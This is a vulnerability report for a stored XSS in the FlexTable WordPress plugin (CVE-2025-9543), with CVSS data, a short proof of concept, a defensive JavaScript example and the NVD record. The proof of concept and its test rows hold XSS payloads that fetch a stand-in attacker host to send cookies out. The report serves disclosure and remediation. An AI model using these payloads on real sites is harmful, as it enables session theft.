Security Vulnerability Report
CVE-2025-9543 CVSS 3.5 LOW

CVE-2025-9543

Published: 2026-01-05 06:16:04
Last Modified: 2026-04-15 00:35:42

Description

The FlexTable WordPress plugin before 3.19.2 does not sanitise and escape the imported links from Google Sheet cells, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available from NVD for this entry (vulnStatus: Deferred).

Affected: FlexTable WordPress plugin < 3.19.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-9543 PoC - FlexTable WordPress Plugin Stored XSS
// This PoC demonstrates how a high-privilege user (e.g. an admin whose
// unfiltered_html capability is disallowed, as in multisite) can inject
// malicious scripts via Google Sheet import

// Step 1: Prepare malicious Google Sheet with XSS payload in link cells
const maliciousSheetData = [
  ['Product', 'Price', 'Link'],
  ['Item1', '$100', '<a href="javascript:alert(document.domain)">View Details</a>'],
  ['Item2', '$200', '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>'],
  ['Item3', '$300', '<svg onload=fetch("https://attacker.com/log?d="+btoa(document.cookie))>']
];

// Step 2: Configure FlexTable to import from the malicious Google Sheet
const flexTableConfig = {
  plugin: 'FlexTable',
  version: '3.19.1', // Vulnerable version (any release before 3.19.2)
  importSource: 'google_sheet',
  sheetId: 'MALICIOUS_SHEET_ID', // placeholder, not a real sheet ID
  autoUpdate: true
};

// Step 3: XSS payload triggers when page renders the table
// The injected JavaScript executes in victim browser context
// Example attack URL pattern:
// Admin accesses: /wp-admin/admin.php?page=flex-table&action=import
// Or any page displaying the imported table content
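The description and the PoC above describe the same class of bug: a spreadsheet cell is trusted as HTML when the table is rendered. The following is an added example, not FlexTable's code and not part of the advisory: a JavaScript (Node) model of a link-cell renderer in its vulnerable shape beside a hardened shape, plus a pre-import audit that flags cells the hardened renderer would refuse to turn into a link. The sample rows, the link-column index and all function names are constructed here for illustration; the real plugin is PHP and its internals are not shown on this page.

```javascript
// Added example (not FlexTable's code): model of turning a spreadsheet "Link"
// cell into table HTML, in the vulnerable shape the advisory describes (cell
// content trusted as HTML) and in a hardened shape (cell content treated as
// data, href restricted to http/https, everything escaped on output).
// The rows below are constructed here; they mirror the payload shapes in the PoC.

const SAMPLE_ROWS = [
  ['Item1', '$100', '<a href="javascript:alert(document.domain)">View Details</a>'],
  ['Item2', '$200', '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>'],
  ['Item3', '$300', '<svg onload=fetch("https://attacker.com/log?d="+btoa(document.cookie))>'],
  ['Item4', '$400', 'https://example.com/item4'],
  ['Item5', '$500', '<a href="https://example.com/item5">Item 5</a>'],
];
const LINK_COLUMN = 2; // assumed column layout for this example

// Escape the five characters that matter in HTML text and attribute context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable shape: the imported cell is interpolated into the page as-is,
// so any markup or script in the sheet lands in every visitor's browser.
function renderCellVulnerable(cell) {
  return `<td>${cell}</td>`;
}

// Accept only an absolute http(s) URL; 'javascript:', 'data:' and non-URLs
// are rejected. WHATWG URL parsing also normalises scheme and host case.
function safeHref(raw) {
  let url;
  try {
    url = new URL(String(raw).trim());
  } catch {
    return null;
  }
  return url.protocol === 'http:' || url.protocol === 'https:' ? url.href : null;
}

// A link cell is either a bare URL or exactly one <a href="...">text</a> with
// no other markup; anything else is treated as plain text, never as HTML.
function parseLinkCell(cell) {
  const m = /^\s*<a\s+href\s*=\s*"([^"]*)"\s*>([^<]*)<\/a>\s*$/i.exec(cell);
  return m ? { href: m[1], text: m[2] } : { href: cell, text: cell };
}

// Hardened shape: build the anchor from validated parts and escape on output.
function renderCellHardened(cell) {
  const { href, text } = parseLinkCell(cell);
  const url = safeHref(href);
  if (url === null) {
    return `<td>${escapeHtml(text)}</td>`; // keep the text, drop the link
  }
  return `<td><a href="${escapeHtml(url)}" rel="noopener noreferrer">${escapeHtml(text)}</a></td>`;
}

// Pre-import audit: report link cells that the hardened renderer would not
// accept as a link, so a reviewer can inspect a sheet before it is published.
function flagSuspiciousCells(rows, linkCol = LINK_COLUMN) {
  const flagged = [];
  rows.forEach((row, i) => {
    const cell = row[linkCol];
    const { href, text } = parseLinkCell(cell);
    if (safeHref(href) === null || /[<>]/.test(text)) {
      flagged.push({ row: i, value: cell });
    }
  });
  return flagged;
}

// Usage: show both renderings side by side for the constructed rows.
function demo() {
  for (const row of SAMPLE_ROWS) {
    const cell = row[LINK_COLUMN];
    console.log('vulnerable:', renderCellVulnerable(cell));
    console.log('hardened:  ', renderCellHardened(cell));
  }
  console.log('flagged rows:', flagSuspiciousCells(SAMPLE_ROWS).map((f) => f.row));
}
demo();
```

The point the advisory makes is that this check has to happen server-side, at import or at render, independently of the unfiltered_html capability: a multisite admin without unfiltered_html is normally prevented by WordPress from posting script, and an import path that skips sanitisation re-opens that door. In a WordPress plugin the equivalent building blocks are esc_url() for the href and wp_kses() (or esc_html()) for the text.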

References

https://wpscan.com/vulnerability/6cc212f4-aa61-409a-b257-9c920956a401/ (WPScan advisory, the single reference listed in the NVD record below)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-9543",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-05T06:16:04.017",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The FlexTable WordPress plugin before 3.19.2 does not sanitise and escape the imported links from Google Sheet cells, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N",
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 0.9,
          "impactScore": 2.5
        }
      ]
    },
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/6cc212f4-aa61-409a-b257-9c920956a401/",
        "source": "[email protected]"
      }
    ]
  }
}